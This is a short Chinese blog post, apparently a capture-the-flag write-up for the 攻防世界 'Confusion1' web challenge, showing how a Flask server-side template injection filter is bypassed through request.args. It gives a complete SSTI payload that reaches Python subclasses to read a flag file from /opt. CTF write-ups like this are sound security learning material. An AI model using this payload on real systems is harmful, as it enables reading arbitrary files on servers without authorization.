攻防世界--Confusion1

点亮自己的那盏灯

 关注

阅读 46

2022-01-16

进入页面看到给出一个目录

访问后给出flag的目录

测试发现存在SSTI漏洞

 发现存在过滤

但是并未过滤request,request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象(flask.request ) " 。

利用file类读取文件

最终payload:

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

相关推荐

攻防世界re1

丹柯yx 73 0 0

攻防世界upload1

半夜放水 67 0 0

攻防世界wp(web1)

脱下愤怒的小裤衩 115 0 0

攻防世界new bird区1——5

minute_5 63 0 0

攻防世界 warmup

juneyale 33 0 0

攻防世界 supersqli

十里一走马 29 0 0

【攻防世界】lottery

徐一村 27 0 0

攻防世界game

路西法阁下 108 0 0

攻防世界-fakebook

若如初梘 44 0 0

攻防世界 WEB

全栈学习笔记 102 0 0

精彩评论(0)

0 0 举报